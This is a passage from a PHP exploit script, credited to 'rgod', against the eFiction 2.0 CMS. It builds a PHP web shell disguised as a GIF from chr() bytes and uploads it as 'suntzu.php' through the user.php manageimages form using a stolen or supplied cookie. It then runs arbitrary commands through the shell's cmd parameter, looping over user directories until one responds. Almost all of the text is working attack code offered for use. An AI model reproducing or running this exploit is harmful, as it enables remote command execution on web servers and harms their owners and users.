    chr(0x00).chr(0xc8).chr(0x00).chr(0x10).chr(0xd5).chr(0x00).
    chr(0xe8).chr(0xf5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
    chr(0x00).chr(0xff).chr(0x00).chr(0x13).chr(0xff).chr(0x00).
    chr(0x6c).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
    chr(0x74).chr(0x6a).chr(0x00).chr(0x03).chr(0x16).chr(0x00).
    chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
    chr(0x00).chr(0xc4).chr(0x00).chr(0x30).chr(0x1e).chr(0x00).
    chr(0x75).chr(0xe5).chr(0x00).chr(0x15).chr(0x77).chr(0x00).
    chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
    chr(0x00).chr(0x15).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
    chr(0x00).chr(0x00).chr(0x00).chr(0xdc).chr(0x00).chr(0x00).
    chr(0xe7).chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
    chr(0x00).chr(0x70).chr(0x00).chr(0x01).chr(0x59).chr(0x00).
    chr(0x00).chr(0x18).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
    chr(0x00).chr(0x04).chr(0x00).chr(0x88).chr(0x01).chr(0x00).
    chr(0xe8).chr(0x05).chr(0x00).chr(0x12).chr(0x01).chr(0x00).
    chr(0x00).chr(0x6c).chr(0x00).chr(0x04).chr(0xe3).chr(0x00).
    chr(0x42).chr(0x12).chr(0x00).chr(0x6e).chr(0x00).chr(0x00).
    chr(0x74).chr(0x7e).chr(0x00).chr(0x30).chr(0x00).chr(0x00).
    chr(0x87).chr(0x00).chr(0x00).chr(0x6e).chr(0xc0).chr(0x00).
    chr(0x74).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
    chr(0xff).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
    chr(0xff).chr(0xff).chr(0x00).chr(0xd6).chr(0xff).chr(0x00).
    chr(0x32).chr(0xff).chr(0x00).chr(0x6e).chr(0xff).chr(0x00).
    chr(0x74).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
    chr(0x5b).chr(0xff).chr(0x00).chr(0xe5).chr(0xff).chr(0x00).
    chr(0x77).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
    chr(0x15).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
    chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
    chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
    chr(0x00).chr(0x00).chr(0x00).chr(0x07).chr(0x00).chr(0x00).
    chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
    chr(0x00).chr(0x6b).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
    chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
    chr(0x00).chr(0x58).chr(0x00).chr(0x00).chr(0x03).chr(0x00).
    chr(0xf0).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
    chr(0x00).chr(0x06).chr(0x00).chr(0x00).chr(0xf6).chr(0x00).
    chr(0x00).chr(0xe4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
    chr(0x00).chr(0x0f).chr(0x00).chr(0x00).chr(0x1e).chr(0x00).
    chr(0x00).chr(0xe5).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
    chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).
    chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
    chr(0x00).chr(0xf8).chr(0x74).chr(0x00).chr(0x62).chr(0xe7).
    chr(0x00).chr(0x01).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
    chr(0x00).chr(0x00).chr(0xc8).chr(0x68).chr(0x00).chr(0x28).
    chr(0x32).chr(0x15).chr(0xe5).chr(0xe6).chr(0x00).chr(0x77).
    chr(0x77).chr(0xa4).chr(0x00).chr(0xff).chr(0xe5).chr(0x00).
    chr(0xff).chr(0x12).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
    chr(0xff).chr(0x00).chr(0x00).chr(0x6c).chr(0x00).chr(0x00).
    chr(0x5b).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
    chr(0x77).chr(0xfc).chr(0xf8).chr(0x36).chr(0xf7).chr(0x62).
    chr(0x00).chr(0x12).chr(0x15).chr(0x00).chr(0x00).chr(0x00).
    chr(0x00).chr(0x05).chr(0x00).chr(0x36).chr(0x90).chr(0x01).
    chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
    chr(0x00).chr(0xc8).chr(0x04).chr(0xd8).chr(0xd5).chr(0x29).
    chr(0xed).chr(0xf5).chr(0xe5).chr(0x12).chr(0x77).chr(0x77).
    chr(0x00).chr(0xff).chr(0x94).chr(0xff).chr(0xff).chr(0xe7).
    chr(0xff).chr(0xff).chr(0x12).chr(0xff).chr(0xff).chr(0x00).
    chr(0xff).chr(0x6a).chr(0x64).chr(0x00).chr(0x16).chr(0x2f).
    chr(0x00).chr(0xf4).chr(0xe6).chr(0x00).chr(0x77).chr(0x77).
    chr(0x00).chr(0xe0).chr(0x00).chr(0x9c).chr(0x18).chr(0x00).
    chr(0xe8).chr(0xe5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
    chr(0x00).chr(0x00).chr(0xff).chr(0x4e).chr(0x00).chr(0xff).
    chr(0x21).chr(0x15).chr(0xff).chr(0x4c).chr(0x00).chr(0xff).
    chr(0x00).chr(0x00).chr(0x6f).chr(0x7c).chr(0x00).chr(0x10).
    chr(0xe8).chr(0x00).chr(0xe5).chr(0x12).chr(0x00).chr(0x77).
    chr(0x00).chr(0xf8).chr(0x00).chr(0x7b).chr(0x62).chr(0x00).
    chr(0xe0).chr(0x15).chr(0x00).chr(0x4e).chr(0x00).chr(0x00).
    chr(0x00).chr(0x00).chr(0x98).chr(0xb0).chr(0x01).chr(0xe8).
    chr(0xe8).chr(0x00).chr(0x12).chr(0x12).chr(0x00).chr(0x00).
    chr(0x00).chr(0x64).chr(0x98).chr(0x6f).chr(0x2f).chr(0x10).
    chr(0x10).chr(0xe6).chr(0xe5).chr(0xe5).chr(0x77).chr(0x77).
    chr(0x77).chr(0x00).chr(0x10).chr(0x52).chr(0x00).chr(0xe4).
    chr(0xe9).chr(0x00).chr(0x4e).chr(0x12).chr(0x00).chr(0x00).
    chr(0x00).chr(0x61).chr(0x20).chr(0xc8).chr(0x00).chr(0x02).
    chr(0xff).chr(0x6c).chr(0x4f).chr(0xff).chr(0x00).chr(0x00).
    chr(0x7f).chr(0x69).chr(0x00).chr(0x1c).chr(0x00).chr(0x01).
    chr(0xe9).chr(0x61).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
    chr(0x00).chr(0x29).chr(0x94).chr(0x00).chr(0x00).chr(0xe7).
    chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
    chr(0x00).chr(0x00).chr(0x00).chr(0x6f).chr(0x00).chr(0x01).
    chr(0x10).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
    chr(0x77).chr(0x00).chr(0xa0).chr(0x00).chr(0x00).chr(0x3a).
    chr(0x00).chr(0x00).chr(0x50).chr(0x00).chr(0x00).chr(0x00).
    chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x30).
    chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x69).
    chr(0x00).chr(0x00).chr(0x61).chr(0x60).chr(0x00).chr(0x74).
    chr(0xf1).chr(0x00).chr(0x74).chr(0x15).chr(0x00).chr(0x69).
    chr(0x00).chr(0x00).chr(0x00).chr(0xf0).chr(0x00).chr(0x00).
    chr(0xaa).chr(0x00).chr(0x02).chr(0x47).chr(0x00).chr(0x00).
    chr(0x00).chr(0x21).chr(0xf9).chr(0x04).chr(0x00).chr(0x00).
    chr(0x00).chr(0x00).chr(0x00).chr(0x2c).chr(0x00).chr(0x00).
    chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x01).chr(0x00).
    chr(0x07).chr(0x08).chr(0x04).chr(0x00).chr(0x01).chr(0x04).
    chr(0x04).chr(0x00).chr(0x3b).chr(0x00);

    $data='-----------------------------7d529a1d23092a
    Content-Disposition: form-data; name="upfile"; filename="C:\suntzu.php"
    Content-Type: image/gif

    '.$SHELL.'
    -----------------------------7d529a1d23092a
    Content-Disposition: form-data; name="submit"

    upload
    -----------------------------7d529a1d23092a--
    ';

    $packet="POST ".$p."user.php?action=manageimages&upload=upload HTTP/1.1\r\n";
    $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
    $packet.="Referer: http://".$host.":".$port.$path."user.php?action=manageimages&upload=upload\r\n";
    $packet.="Accept-Language: en\r\n";
    $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";
    $packet.="Accept-Encoding: text/plain\r\n";
    $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
    $packet.="Host: ".$host.":".$port."\r\n";
    $packet.="Content-Length: ".strlen($data)."\r\n";
    $packet.="Cookie: ".$COOKIE."\r\n";
    $packet.="Connection: Close\r\n";
    $packet.="Cache-Control: no-cache\r\n\r\n";
    $packet.=$data;
    show($packet);
    sendpacketii($packet);

    #STEP 3 -> Launch commands...
    $packet="GET ".$p."stories/".$username."/images/suntzu.php?cmd=".urlencode($command)." HTTP/1.1\r\n";
    $packet.="Host: ".$host.":".$port."\r\n";
    $packet.="Connection: Close\r\n\r\n";
    show($packet);
    sendpacketii($packet);
    if (stripos($html,"GIF89")!==false) {echo "Exploit succeeded..."; die;} // shell echoes its GIF header first
                         else {echo "Trying STEP 4...";}

    #STEP 4 -> If Step 3 failed... maybe this is efiction 2.0, cycliing GET requests...
    for ($i=1; $i<=100; $i++)
    {
    $packet="GET ".$p."stories/".$i."/images/suntzu.php?cmd=".urlencode($command)." HTTP/1.1\r\n";
    $packet.="Host: ".$host.":".$port."\r\n";
    $packet.="Connection: Close\r\n\r\n";
    show($packet);
    sendpacketii($packet);
    if (stripos($html,"GIF89")!==false) {echo "Exploit succeeded..."; die;}
    }
    //if you are here...
    echo "Exploit failed...<br>";
    }
    else
    {echo "Fill * required fields, optionally specify a proxy...";}
    ?>

    rgod
    site:
    http://rgod.altervista.org
    mail: retrogod@aliceposta.it
    original advisory: http://rgod.altervista.org/efiction2_xpl.html

